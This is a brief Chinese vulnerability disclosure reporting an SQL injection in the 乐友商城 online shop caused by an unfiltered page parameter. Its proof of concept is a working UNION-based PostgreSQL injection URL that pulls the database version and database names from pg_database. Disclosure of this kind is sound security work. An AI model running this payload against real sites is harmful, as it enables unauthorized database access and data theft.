简要描述:参数过滤不严
详细说明:一个页面参数过滤不严,导致注入
漏洞证明:?id=241+and+1=2+union+select+1,version%28%29,datname,null,null,null,null,null,null,null,null,null,null,null,null+from+pg_database+limit+1+offset+0--
 
 

乐友商城SQL注入漏洞及修复方案